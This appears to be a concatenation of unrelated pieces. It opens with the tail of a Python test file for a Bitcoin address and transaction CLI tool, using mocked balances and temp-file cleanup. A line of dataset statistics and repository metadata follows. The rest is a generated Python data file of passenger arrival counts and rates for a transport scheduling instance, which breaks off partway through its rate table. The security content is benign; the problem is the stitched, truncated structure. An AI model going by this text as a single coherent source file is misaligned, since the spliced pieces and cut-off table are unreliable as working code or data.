    if os.path.exists(f"{t.output_path}/{t.vkhandle}.csv"):
        os.remove(f"{t.output_path}/{t.vkhandle}.csv")
    if os.path.exists(f"{t.output_path}/addr{t.vkhandle}.json"):
        os.remove(f"{t.output_path}/addr{t.vkhandle}.json")
    if os.path.exists(f"{t.output_path}/tx{t.vkhandle}.json"):
        os.remove(f"{t.output_path}/tx{t.vkhandle}.json")
    i = 1
    while i < len(t.tx_inputs) + 1:
        if os.path.exists(f"{t.output_path}/unsignedTx{t.vkhandle}_{i}.bin"):
            os.remove(f"{t.output_path}/unsignedTx{t.vkhandle}_{i}.bin")
        i += 1
    if os.path.exists(t.output_path):
        os.rmdir(t.output_path)


# TEST ADDR CSV FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_json_file', return_value=None, autospec=True)
def test_addr_csv_file(*args):
    set_up_files()
    runner = CliRunner()
    result = runner.invoke(main, ['-out', t.output_path, 'addr',
                                  t.pub_key_file_name, '-v', t.vkhandle, '-s', t.skhandle])
    control_date = str(excel_date(datetime.datetime.now()))
    file = open(f"{t.output_path}/{t.vkhandle}.csv", 'r')
    test_csv = file.read().split(sep=', ')
    file.close()
    test_date = test_csv.pop()
    tear_down_files()
    assert result.exit_code == 0
    assert test_date == control_date
    assert test_csv[0] == t.vkhandle
    assert test_csv[1] == t.skhandle
    assert test_csv[2] == t.address
    assert int(test_csv[3]) == t.confirmed_balance


# TEST ADDR JSON FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_csv_file', return_value=None, autospec=True)
def test_addr_json_file(*args):
    set_up_files()
    runner = CliRunner()
    result = runner.invoke(main, ['-out', t.output_path, 'addr',
                                  t.pub_key_file_name, '-v', t.vkhandle, '-s', t.skhandle])
    file = open(f"{t.output_path}/addr{t.vkhandle}.json", 'r')
    json_data = file.read()
    file.close()
    tear_down_files()
    data = json.loads(json_data)
    assert result.exit_code == 0
    for key in data.keys():
        assert data[key] == t.addr_json_file[key]
    for key in t.addr_json_file.keys():
        assert data[key] == t.addr_json_file[key]


# TEST REFRESH CSV FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
def test_refresh_csv_file(*args):
    set_up_files()
    runner = CliRunner()
    result = runner.invoke(main, ['-out', t.output_path, 'refresh', t.addr_json_file_name])
    control_date = str(excel_date(datetime.datetime.now()))
    file = open(f"{t.output_path}/{t.vkhandle}.csv", 'r')
    test_csv = file.read().split(sep=', ')
    file.close()
    test_date = test_csv.pop()
    tear_down_files()
    assert result.exit_code == 0
    assert test_date == control_date
    assert test_csv[0] == t.vkhandle
    assert test_csv[1] == t.skhandle
    assert test_csv[2] == t.address
    assert int(test_csv[3]) == t.confirmed_balance


# TEST TX JSON FILE
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_unsigned_tx_files', return_value=None, autospec=True)
def test_tx_json_file(*args):
    set_up_files()
    runner = CliRunner()
    result = runner.invoke(main, ['-out', t.output_path, 'tx', t.tx_json_file_name, '-a', '-f', t.fee, '-r', t.recipient])
    file = open(f"{t.output_path}/tx{t.vkhandle}.json", 'r')
    json_data = file.read()
    file.close()
    tear_down_files()
    data = json.loads(json_data)
    assert result.exit_code == 0
    for key in data.keys():
        assert data[key] == t.tx_json_file[key]
    for key in t.tx_json_file.keys():
        assert data[key] == t.tx_json_file[key]


# TEST TX BIN FILES
@mock.patch('src.bitcoin_addresses.get_confirmed_sat_balance', return_value=t.confirmed_balance, autospec=True)
@mock.patch('src.models.get_tx_inputs', return_value=t.tx_inputs, autospec=True)
@mock.patch('src.routes.create_json_file', return_value=None, autospec=True)
def test_tx_bin_files(*args):
    set_up_files()
    runner = CliRunner()
    result = runner.invoke(main, ['-out', t.output_path, 'tx', t.tx_json_file_name, '-a', '-f', t.fee, '-r', t.recipient])
    if result.exit_code != 0:
        tear_down_files()
    assert result.exit_code == 0
    i = 1
    tx_bin_files = []
    while i < len(t.tx_inputs) + 1:
        file = open(f"{t.output_path}/unsignedTx{t.vkhandle}_{i}.bin", 'rb')
        tx_bin_files.append(file.read().hex())
        file.close()
        i += 1
    tear_down_files()
    assert tx_bin_files == t.tosign_tx_hashed_hex
| 32.754491 | 122 | 0.682998 | 854 | 5,470 | 4.135831 | 0.124122 | 0.041619 | 0.065402 | 0.044168 | 0.848811 | 0.844564 | 0.833239 | 0.802661 | 0.736976 | 0.64949 | 0 | 0.005033 | 0.164534 | 5,470 | 166 | 123 | 32.951807 | 0.767834 | 0.01755 | 0 | 0.663866 | 0 | 0 | 0.190237 | 0.17738 | 0 | 0 | 0 | 0 | 0.168067 | 1 | 0.058824 | false | 0 | 0.07563 | 0 | 0.134454 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4addd4506bb6a2bc610d5d4c6aee1bbee378cad5 | 37,683 | py | Python | instances/passenger_demand/pas-20210421-2109-int1/98.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210421-2109-int1/98.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210421-2109-int1/98.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null |
"""
PASSENGERS
"""
numPassengers = 2262
passenger_arriving = (
(3, 10, 3, 3, 1, 0, 4, 8, 2, 2, 1, 0), # 0
(1, 5, 4, 2, 1, 0, 5, 6, 3, 0, 4, 0), # 1
(8, 6, 7, 5, 2, 0, 7, 6, 5, 4, 4, 0), # 2
(2, 3, 6, 4, 2, 0, 6, 5, 6, 1, 1, 0), # 3
(5, 3, 4, 3, 1, 0, 3, 4, 0, 3, 1, 0), # 4
(3, 5, 4, 6, 1, 0, 3, 10, 4, 4, 1, 0), # 5
(1, 3, 5, 2, 1, 0, 4, 5, 7, 2, 2, 0), # 6
(3, 6, 2, 2, 1, 0, 2, 8, 5, 3, 0, 0), # 7
(2, 3, 9, 1, 0, 0, 9, 7, 3, 5, 3, 0), # 8
(4, 7, 3, 4, 1, 0, 7, 4, 2, 2, 6, 0), # 9
(2, 4, 4, 3, 1, 0, 2, 3, 1, 4, 0, 0), # 10
(3, 9, 7, 1, 2, 0, 6, 7, 4, 3, 1, 0), # 11
(3, 6, 9, 1, 1, 0, 4, 7, 2, 6, 2, 0), # 12
(0, 5, 3, 2, 4, 0, 3, 8, 3, 5, 2, 0), # 13
(5, 12, 3, 1, 2, 0, 4, 4, 5, 2, 2, 0), # 14
(5, 5, 5, 3, 1, 0, 3, 5, 5, 6, 4, 0), # 15
(2, 6, 3, 0, 2, 0, 5, 4, 6, 2, 2, 0), # 16
(2, 7, 9, 1, 3, 0, 4, 5, 3, 3, 0, 0), # 17
(2, 5, 7, 1, 2, 0, 6, 7, 4, 2, 1, 0), # 18
(3, 10, 5, 2, 1, 0, 7, 6, 5, 3, 2, 0), # 19
(2, 4, 6, 1, 1, 0, 4, 5, 1, 3, 0, 0), # 20
(4, 2, 3, 2, 0, 0, 2, 8, 2, 3, 0, 0), # 21
(1, 5, 4, 1, 2, 0, 5, 9, 5, 4, 2, 0), # 22
(2, 5, 4, 3, 2, 0, 9, 10, 3, 2, 1, 0), # 23
(2, 7, 5, 3, 1, 0, 3, 12, 4, 2, 2, 0), # 24
(5, 8, 6, 2, 2, 0, 1, 4, 4, 5, 2, 0), # 25
(5, 4, 3, 1, 1, 0, 7, 8, 2, 0, 3, 0), # 26
(6, 11, 0, 0, 0, 0, 6, 8, 5, 5, 4, 0), # 27
(4, 7, 6, 2, 2, 0, 8, 8, 4, 4, 2, 0), # 28
(2, 9, 7, 2, 4, 0, 5, 4, 9, 0, 2, 0), # 29
(3, 8, 1, 1, 3, 0, 7, 3, 6, 4, 2, 0), # 30
(4, 5, 6, 4, 2, 0, 5, 5, 7, 6, 2, 0), # 31
(8, 6, 6, 7, 1, 0, 4, 8, 5, 6, 1, 0), # 32
(0, 7, 5, 4, 2, 0, 6, 9, 6, 7, 3, 0), # 33
(1, 4, 5, 5, 2, 0, 6, 5, 5, 1, 3, 0), # 34
(4, 3, 7, 2, 3, 0, 3, 9, 5, 2, 1, 0), # 35
(0, 4, 5, 1, 3, 0, 6, 6, 2, 7, 2, 0), # 36
(4, 6, 7, 1, 0, 0, 6, 3, 3, 4, 4, 0), # 37
(1, 8, 5, 7, 0, 0, 8, 5, 4, 7, 2, 0), # 38
(2, 9, 6, 2, 1, 0, 0, 8, 2, 7, 0, 0), # 39
(1, 7, 5, 2, 0, 0, 3, 7, 1, 3, 6, 0), # 40
(0, 6, 5, 3, 3, 0, 8, 7, 3, 5, 3, 0), # 41
(6, 9, 7, 5, 4, 0, 4, 8, 5, 3, 2, 0), # 42
(3, 8, 5, 5, 3, 0, 3, 5, 2, 6, 1, 0), # 43
(3, 5, 6, 1, 0, 0, 4, 6, 1, 2, 1, 0), # 44
(2, 7, 1, 2, 1, 0, 13, 7, 2, 6, 1, 0), # 45
(4, 4, 6, 2, 3, 0, 3, 5, 2, 6, 3, 0), # 46
(2, 6, 4, 3, 1, 0, 5, 2, 2, 3, 1, 0), # 47
(4, 6, 7, 3, 5, 0, 4, 7, 6, 1, 1, 0), # 48
(7, 7, 3, 2, 1, 0, 4, 3, 2, 2, 1, 0), # 49
(4, 6, 3, 2, 0, 0, 2, 5, 7, 4, 1, 0), # 50
(2, 7, 4, 4, 3, 0, 5, 3, 4, 1, 0, 0), # 51
(3, 7, 4, 2, 2, 0, 3, 3, 4, 4, 1, 0), # 52
(1, 7, 4, 2, 2, 0, 2, 5, 6, 4, 1, 0), # 53
(3, 7, 6, 1, 4, 0, 2, 3, 9, 3, 2, 0), # 54
(2, 7, 9, 1, 2, 0, 5, 7, 2, 4, 0, 0), # 55
(3, 6, 4, 0, 1, 0, 1, 8, 2, 4, 1, 0), # 56
(3, 6, 10, 2, 2, 0, 4, 3, 5, 5, 0, 0), # 57
(6, 7, 7, 7, 2, 0, 1, 6, 5, 1, 3, 0), # 58
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 59
)
station_arriving_intensity = (
(2.649651558384548, 6.796460700757575, 7.9942360218509, 6.336277173913043, 7.143028846153846, 4.75679347826087), # 0
(2.6745220100478, 6.872041598712823, 8.037415537524994, 6.371564387077295, 7.196566506410256, 4.7551721391908215), # 1
(2.699108477221734, 6.946501402918069, 8.07957012282205, 6.406074879227053, 7.248974358974359, 4.753501207729468), # 2
(2.72339008999122, 7.019759765625, 8.120668982969152, 6.4397792119565205, 7.300204326923078, 4.7517809103260875), # 3
(2.747345978441128, 7.091736339085298, 8.160681323193373, 6.472647946859904, 7.350208333333334, 4.750011473429951), # 4
(2.7709552726563262, 7.162350775550646, 8.199576348721793, 6.504651645531401, 7.39893830128205, 4.748193123490338), # 5
(2.794197102721686, 7.231522727272727, 8.237323264781493, 6.535760869565218, 7.446346153846154, 4.746326086956522), # 6
(2.817050598722076, 7.299171846503226, 8.273891276599542, 6.565946180555556, 7.492383814102565, 4.744410590277778), # 7
(2.8394948907423667, 7.365217785493826, 8.309249589403029, 6.595178140096618, 7.537003205128205, 4.7424468599033816), # 8
(2.8615091088674274, 7.429580196496212, 8.343367408419024, 6.623427309782609, 7.580156249999999, 4.740435122282609), # 9
(2.8830723831821286, 7.492178731762065, 8.376213938874606, 6.65066425120773, 7.621794871794872, 4.738375603864734), # 10
(2.9041638437713395, 7.55293304354307, 8.407758385996857, 6.676859525966184, 7.661870993589743, 4.736268531099034), # 11
(2.92476262071993, 7.611762784090908, 8.437969955012854, 6.7019836956521734, 7.700336538461538, 4.734114130434782), # 12
(2.944847844112769, 7.668587605657268, 8.46681785114967, 6.726007321859903, 7.737143429487181, 4.731912628321256), # 13
(2.9643986440347283, 7.723327160493828, 8.494271279634388, 6.748900966183574, 7.772243589743589, 4.729664251207729), # 14
(2.9833941505706756, 7.775901100852272, 8.520299445694086, 6.770635190217391, 7.8055889423076925, 4.7273692255434785), # 15
(3.001813493805482, 7.826229078984287, 8.544871554555842, 6.791180555555555, 7.8371314102564105, 4.725027777777778), # 16
(3.019635803824017, 7.874230747141554, 8.567956811446729, 6.810507623792271, 7.866822916666667, 4.722640134359904), # 17
(3.03684021071115, 7.919825757575757, 8.589524421593831, 6.82858695652174, 7.894615384615387, 4.72020652173913), # 18
(3.053405844551751, 7.962933762538579, 8.609543590224222, 6.845389115338164, 7.9204607371794875, 4.717727166364734), # 19
(3.0693118354306894, 8.003474414281705, 8.62798352256498, 6.860884661835749, 7.944310897435898, 4.71520229468599), # 20
(3.084537313432836, 8.041367365056816, 8.644813423843189, 6.875044157608696, 7.9661177884615375, 4.712632133152174), # 21
(3.099061408643059, 8.076532267115601, 8.660002499285918, 6.887838164251208, 7.985833333333332, 4.710016908212561), # 22
(3.1128632511462295, 8.108888772709737, 8.673519954120252, 6.899237243357488, 8.003409455128205, 4.707356846316426), # 23
(3.125921971027217, 8.138356534090908, 8.685334993573264, 6.909211956521739, 8.018798076923076, 4.704652173913043), # 24
(3.1382166983708903, 8.164855203510802, 8.695416822872037, 6.917732865338165, 8.03195112179487, 4.701903117451691), # 25
(3.1497265632621207, 8.188304433221099, 8.703734647243644, 6.9247705314009655, 8.042820512820512, 4.699109903381642), # 26
(3.160430695785777, 8.208623875473483, 8.710257671915166, 6.930295516304349, 8.051358173076924, 4.696272758152174), # 27
(3.1703082260267292, 8.22573318251964, 8.714955102113683, 6.934278381642512, 8.057516025641025, 4.69339190821256), # 28
(3.1793382840698468, 8.239552006611252, 8.717796143066266, 6.936689689009662, 8.061245993589743, 4.690467580012077), # 29
(3.1875, 8.25, 8.71875, 6.9375, 8.0625, 4.6875), # 30
(3.1951370284526854, 8.258678799715907, 8.718034948671496, 6.937353656045752, 8.062043661347518, 4.683376259786773), # 31
(3.202609175191816, 8.267242897727273, 8.715910024154589, 6.93691748366013, 8.06068439716312, 4.677024758454107), # 32
(3.2099197969948845, 8.275691228693182, 8.712405570652175, 6.936195772058824, 8.058436835106383, 4.66850768365817), # 33
(3.217072250639386, 8.284022727272728, 8.70755193236715, 6.935192810457517, 8.05531560283688, 4.657887223055139), # 34
(3.224069892902813, 8.292236328124998, 8.701379453502415, 6.933912888071895, 8.051335328014185, 4.645225564301183), # 35
(3.23091608056266, 8.300330965909092, 8.69391847826087, 6.932360294117648, 8.046510638297873, 4.630584895052474), # 36
(3.2376141703964194, 8.308305575284091, 8.68519935084541, 6.9305393178104575, 8.040856161347516, 4.614027402965184), # 37
(3.2441675191815853, 8.31615909090909, 8.675252415458937, 6.9284542483660125, 8.034386524822695, 4.595615275695485), # 38
(3.250579483695652, 8.323890447443182, 8.664108016304347, 6.926109375, 8.027116356382978, 4.57541070089955), # 39
(3.2568534207161126, 8.331498579545455, 8.651796497584542, 6.923508986928105, 8.019060283687942, 4.5534758662335495), # 40
(3.26299268702046, 8.338982421874999, 8.638348203502416, 6.920657373366013, 8.010232934397163, 4.529872959353657), # 41
(3.269000639386189, 8.34634090909091, 8.62379347826087, 6.917558823529411, 8.000648936170213, 4.504664167916042), # 42
(3.2748806345907933, 8.353572975852272, 8.608162666062801, 6.914217626633987, 7.990322916666666, 4.477911679576878), # 43
(3.2806360294117645, 8.360677556818182, 8.591486111111111, 6.910638071895424, 7.979269503546099, 4.449677681992337), # 44
(3.286270180626598, 8.367653586647727, 8.573794157608697, 6.906824448529411, 7.967503324468085, 4.420024362818591), # 45
(3.291786445012788, 8.374500000000001, 8.555117149758455, 6.902781045751634, 7.955039007092199, 4.389013909711811), # 46
(3.297188179347826, 8.381215731534091, 8.535485431763284, 6.898512152777777, 7.941891179078015, 4.356708510328169), # 47
(3.3024787404092075, 8.387799715909091, 8.514929347826087, 6.894022058823529, 7.928074468085106, 4.323170352323839), # 48
(3.307661484974424, 8.39425088778409, 8.493479242149759, 6.889315053104576, 7.91360350177305, 4.288461623354989), # 49
(3.312739769820972, 8.40056818181818, 8.471165458937199, 6.884395424836602, 7.898492907801418, 4.252644511077794), # 50
(3.317716951726343, 8.406750532670454, 8.448018342391304, 6.879267463235294, 7.882757313829787, 4.215781203148426), # 51
(3.322596387468031, 8.412796875, 8.424068236714975, 6.87393545751634, 7.86641134751773, 4.177933887223055), # 52
(3.3273814338235295, 8.41870614346591, 8.39934548611111, 6.868403696895425, 7.849469636524823, 4.139164750957854), # 53
(3.332075447570333, 8.424477272727271, 8.373880434782608, 6.8626764705882355, 7.831946808510638, 4.099535982008995), # 54
(3.336681785485933, 8.430109197443182, 8.347703426932366, 6.856758067810458, 7.813857491134752, 4.05910976803265), # 55
(3.341203804347826, 8.435600852272726, 8.320844806763285, 6.8506527777777775, 7.795216312056738, 4.017948296684991), # 56
(3.345644860933504, 8.440951171875001, 8.29333491847826, 6.844364889705882, 7.77603789893617, 3.9761137556221886), # 57
(3.3500083120204605, 8.44615909090909, 8.265204106280192, 6.837898692810458, 7.756336879432624, 3.9336683325004165), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_arriving_acc = (
(3, 10, 3, 3, 1, 0, 4, 8, 2, 2, 1, 0), # 0
(4, 15, 7, 5, 2, 0, 9, 14, 5, 2, 5, 0), # 1
(12, 21, 14, 10, 4, 0, 16, 20, 10, 6, 9, 0), # 2
(14, 24, 20, 14, 6, 0, 22, 25, 16, 7, 10, 0), # 3
(19, 27, 24, 17, 7, 0, 25, 29, 16, 10, 11, 0), # 4
(22, 32, 28, 23, 8, 0, 28, 39, 20, 14, 12, 0), # 5
(23, 35, 33, 25, 9, 0, 32, 44, 27, 16, 14, 0), # 6
(26, 41, 35, 27, 10, 0, 34, 52, 32, 19, 14, 0), # 7
(28, 44, 44, 28, 10, 0, 43, 59, 35, 24, 17, 0), # 8
(32, 51, 47, 32, 11, 0, 50, 63, 37, 26, 23, 0), # 9
(34, 55, 51, 35, 12, 0, 52, 66, 38, 30, 23, 0), # 10
(37, 64, 58, 36, 14, 0, 58, 73, 42, 33, 24, 0), # 11
(40, 70, 67, 37, 15, 0, 62, 80, 44, 39, 26, 0), # 12
(40, 75, 70, 39, 19, 0, 65, 88, 47, 44, 28, 0), # 13
(45, 87, 73, 40, 21, 0, 69, 92, 52, 46, 30, 0), # 14
(50, 92, 78, 43, 22, 0, 72, 97, 57, 52, 34, 0), # 15
(52, 98, 81, 43, 24, 0, 77, 101, 63, 54, 36, 0), # 16
(54, 105, 90, 44, 27, 0, 81, 106, 66, 57, 36, 0), # 17
(56, 110, 97, 45, 29, 0, 87, 113, 70, 59, 37, 0), # 18
(59, 120, 102, 47, 30, 0, 94, 119, 75, 62, 39, 0), # 19
(61, 124, 108, 48, 31, 0, 98, 124, 76, 65, 39, 0), # 20
(65, 126, 111, 50, 31, 0, 100, 132, 78, 68, 39, 0), # 21
(66, 131, 115, 51, 33, 0, 105, 141, 83, 72, 41, 0), # 22
(68, 136, 119, 54, 35, 0, 114, 151, 86, 74, 42, 0), # 23
(70, 143, 124, 57, 36, 0, 117, 163, 90, 76, 44, 0), # 24
(75, 151, 130, 59, 38, 0, 118, 167, 94, 81, 46, 0), # 25
(80, 155, 133, 60, 39, 0, 125, 175, 96, 81, 49, 0), # 26
(86, 166, 133, 60, 39, 0, 131, 183, 101, 86, 53, 0), # 27
(90, 173, 139, 62, 41, 0, 139, 191, 105, 90, 55, 0), # 28
(92, 182, 146, 64, 45, 0, 144, 195, 114, 90, 57, 0), # 29
(95, 190, 147, 65, 48, 0, 151, 198, 120, 94, 59, 0), # 30
(99, 195, 153, 69, 50, 0, 156, 203, 127, 100, 61, 0), # 31
(107, 201, 159, 76, 51, 0, 160, 211, 132, 106, 62, 0), # 32
(107, 208, 164, 80, 53, 0, 166, 220, 138, 113, 65, 0), # 33
(108, 212, 169, 85, 55, 0, 172, 225, 143, 114, 68, 0), # 34
(112, 215, 176, 87, 58, 0, 175, 234, 148, 116, 69, 0), # 35
(112, 219, 181, 88, 61, 0, 181, 240, 150, 123, 71, 0), # 36
(116, 225, 188, 89, 61, 0, 187, 243, 153, 127, 75, 0), # 37
(117, 233, 193, 96, 61, 0, 195, 248, 157, 134, 77, 0), # 38
(119, 242, 199, 98, 62, 0, 195, 256, 159, 141, 77, 0), # 39
(120, 249, 204, 100, 62, 0, 198, 263, 160, 144, 83, 0), # 40
(120, 255, 209, 103, 65, 0, 206, 270, 163, 149, 86, 0), # 41
(126, 264, 216, 108, 69, 0, 210, 278, 168, 152, 88, 0), # 42
(129, 272, 221, 113, 72, 0, 213, 283, 170, 158, 89, 0), # 43
(132, 277, 227, 114, 72, 0, 217, 289, 171, 160, 90, 0), # 44
(134, 284, 228, 116, 73, 0, 230, 296, 173, 166, 91, 0), # 45
(138, 288, 234, 118, 76, 0, 233, 301, 175, 172, 94, 0), # 46
(140, 294, 238, 121, 77, 0, 238, 303, 177, 175, 95, 0), # 47
(144, 300, 245, 124, 82, 0, 242, 310, 183, 176, 96, 0), # 48
(151, 307, 248, 126, 83, 0, 246, 313, 185, 178, 97, 0), # 49
(155, 313, 251, 128, 83, 0, 248, 318, 192, 182, 98, 0), # 50
(157, 320, 255, 132, 86, 0, 253, 321, 196, 183, 98, 0), # 51
(160, 327, 259, 134, 88, 0, 256, 324, 200, 187, 99, 0), # 52
(161, 334, 263, 136, 90, 0, 258, 329, 206, 191, 100, 0), # 53
(164, 341, 269, 137, 94, 0, 260, 332, 215, 194, 102, 0), # 54
(166, 348, 278, 138, 96, 0, 265, 339, 217, 198, 102, 0), # 55
(169, 354, 282, 138, 97, 0, 266, 347, 219, 202, 103, 0), # 56
(172, 360, 292, 140, 99, 0, 270, 350, 224, 207, 103, 0), # 57
(178, 367, 299, 147, 101, 0, 271, 356, 229, 208, 106, 0), # 58
(178, 367, 299, 147, 101, 0, 271, 356, 229, 208, 106, 0), # 59
)
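
# Illustrative consistency check (an addition for clarity, not part of the
# original generated instance): passenger_arriving_acc holds the running
# column-wise sums of passenger_arriving, so the two tables can be
# cross-validated directly.
assert all(
    passenger_arriving_acc[t][s] == sum(passenger_arriving[u][s] for u in range(t + 1))
    for t in range(len(passenger_arriving))
    for s in range(12)
)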
passenger_arriving_rate = (
(2.649651558384548, 5.43716856060606, 4.79654161311054, 2.534510869565217, 1.428605769230769, 0.0, 4.75679347826087, 5.714423076923076, 3.801766304347826, 3.1976944087403596, 1.359292140151515, 0.0), # 0
(2.6745220100478, 5.497633278970258, 4.822449322514997, 2.5486257548309177, 1.439313301282051, 0.0, 4.7551721391908215, 5.757253205128204, 3.8229386322463768, 3.2149662150099974, 1.3744083197425645, 0.0), # 1
(2.699108477221734, 5.557201122334455, 4.8477420736932295, 2.562429951690821, 1.4497948717948717, 0.0, 4.753501207729468, 5.799179487179487, 3.8436449275362317, 3.23182804912882, 1.3893002805836137, 0.0), # 2
(2.72339008999122, 5.6158078125, 4.872401389781491, 2.575911684782608, 1.4600408653846155, 0.0, 4.7517809103260875, 5.840163461538462, 3.863867527173912, 3.2482675931876606, 1.403951953125, 0.0), # 3
(2.747345978441128, 5.673389071268238, 4.896408793916024, 2.589059178743961, 1.4700416666666667, 0.0, 4.750011473429951, 5.880166666666667, 3.883588768115942, 3.2642725292773487, 1.4183472678170594, 0.0), # 4
(2.7709552726563262, 5.729880620440516, 4.919745809233076, 2.6018606582125603, 1.47978766025641, 0.0, 4.748193123490338, 5.91915064102564, 3.9027909873188404, 3.279830539488717, 1.432470155110129, 0.0), # 5
(2.794197102721686, 5.785218181818181, 4.942393958868895, 2.614304347826087, 1.4892692307692306, 0.0, 4.746326086956522, 5.957076923076922, 3.9214565217391306, 3.294929305912597, 1.4463045454545453, 0.0), # 6
(2.817050598722076, 5.83933747720258, 4.964334765959725, 2.626378472222222, 1.498476762820513, 0.0, 4.744410590277778, 5.993907051282052, 3.939567708333333, 3.309556510639817, 1.459834369300645, 0.0), # 7
(2.8394948907423667, 5.89217422839506, 4.985549753641817, 2.638071256038647, 1.5074006410256409, 0.0, 4.7424468599033816, 6.0296025641025635, 3.9571068840579704, 3.3236998357612113, 1.473043557098765, 0.0), # 8
(2.8615091088674274, 5.943664157196969, 5.006020445051414, 2.649370923913043, 1.5160312499999997, 0.0, 4.740435122282609, 6.064124999999999, 3.9740563858695652, 3.3373469633676094, 1.4859160392992423, 0.0), # 9
(2.8830723831821286, 5.993742985409652, 5.025728363324764, 2.660265700483092, 1.5243589743589743, 0.0, 4.738375603864734, 6.097435897435897, 3.990398550724638, 3.3504855755498424, 1.498435746352413, 0.0), # 10
(2.9041638437713395, 6.042346434834456, 5.044655031598114, 2.6707438103864733, 1.5323741987179484, 0.0, 4.736268531099034, 6.129496794871794, 4.0061157155797105, 3.3631033543987425, 1.510586608708614, 0.0), # 11
(2.92476262071993, 6.089410227272726, 5.062781973007712, 2.680793478260869, 1.5400673076923075, 0.0, 4.734114130434782, 6.16026923076923, 4.021190217391304, 3.375187982005141, 1.5223525568181815, 0.0), # 12
(2.944847844112769, 6.134870084525814, 5.080090710689802, 2.690402928743961, 1.547428685897436, 0.0, 4.731912628321256, 6.189714743589744, 4.035604393115942, 3.386727140459868, 1.5337175211314535, 0.0), # 13
(2.9643986440347283, 6.1786617283950624, 5.096562767780632, 2.699560386473429, 1.5544487179487176, 0.0, 4.729664251207729, 6.217794871794871, 4.049340579710144, 3.397708511853755, 1.5446654320987656, 0.0), # 14
(2.9833941505706756, 6.220720880681816, 5.112179667416451, 2.708254076086956, 1.5611177884615384, 0.0, 4.7273692255434785, 6.2444711538461535, 4.062381114130434, 3.408119778277634, 1.555180220170454, 0.0), # 15
(3.001813493805482, 6.26098326318743, 5.126922932733505, 2.716472222222222, 1.5674262820512819, 0.0, 4.725027777777778, 6.2697051282051275, 4.074708333333333, 3.4179486218223363, 1.5652458157968574, 0.0), # 16
(3.019635803824017, 6.299384597713242, 5.140774086868038, 2.724203049516908, 1.5733645833333332, 0.0, 4.722640134359904, 6.293458333333333, 4.0863045742753625, 3.4271827245786914, 1.5748461494283106, 0.0), # 17
(3.03684021071115, 6.3358606060606055, 5.153714652956299, 2.7314347826086958, 1.578923076923077, 0.0, 4.72020652173913, 6.315692307692308, 4.097152173913043, 3.435809768637532, 1.5839651515151514, 0.0), # 18
(3.053405844551751, 6.370347010030863, 5.165726154134533, 2.738155646135265, 1.5840921474358973, 0.0, 4.717727166364734, 6.336368589743589, 4.107233469202898, 3.4438174360896885, 1.5925867525077158, 0.0), # 19
(3.0693118354306894, 6.402779531425363, 5.1767901135389875, 2.7443538647342995, 1.5888621794871793, 0.0, 4.71520229468599, 6.355448717948717, 4.11653079710145, 3.4511934090259917, 1.6006948828563408, 0.0), # 20
(3.084537313432836, 6.433093892045452, 5.186888054305913, 2.750017663043478, 1.5932235576923073, 0.0, 4.712632133152174, 6.372894230769229, 4.125026494565217, 3.4579253695372754, 1.608273473011363, 0.0), # 21
(3.099061408643059, 6.46122581369248, 5.19600149957155, 2.7551352657004826, 1.5971666666666662, 0.0, 4.710016908212561, 6.388666666666665, 4.132702898550725, 3.464000999714367, 1.61530645342312, 0.0), # 22
(3.1128632511462295, 6.487111018167789, 5.204111972472151, 2.759694897342995, 1.6006818910256408, 0.0, 4.707356846316426, 6.402727564102563, 4.139542346014493, 3.4694079816481005, 1.6217777545419472, 0.0), # 23
(3.125921971027217, 6.5106852272727265, 5.211200996143958, 2.763684782608695, 1.6037596153846152, 0.0, 4.704652173913043, 6.415038461538461, 4.1455271739130435, 3.474133997429305, 1.6276713068181816, 0.0), # 24
(3.1382166983708903, 6.531884162808641, 5.217250093723222, 2.7670931461352657, 1.606390224358974, 0.0, 4.701903117451691, 6.425560897435896, 4.150639719202899, 3.4781667291488145, 1.6329710407021603, 0.0), # 25
(3.1497265632621207, 6.550643546576878, 5.222240788346187, 2.7699082125603858, 1.6085641025641022, 0.0, 4.699109903381642, 6.434256410256409, 4.154862318840579, 3.4814938588974575, 1.6376608866442195, 0.0), # 26
(3.160430695785777, 6.566899100378786, 5.226154603149099, 2.772118206521739, 1.6102716346153847, 0.0, 4.696272758152174, 6.441086538461539, 4.158177309782609, 3.484103068766066, 1.6417247750946966, 0.0), # 27
(3.1703082260267292, 6.580586546015712, 5.228973061268209, 2.7737113526570045, 1.6115032051282048, 0.0, 4.69339190821256, 6.446012820512819, 4.160567028985507, 3.4859820408454727, 1.645146636503928, 0.0), # 28
(3.1793382840698468, 6.591641605289001, 5.230677685839759, 2.7746758756038647, 1.6122491987179486, 0.0, 4.690467580012077, 6.448996794871794, 4.162013813405797, 3.487118457226506, 1.6479104013222503, 0.0), # 29
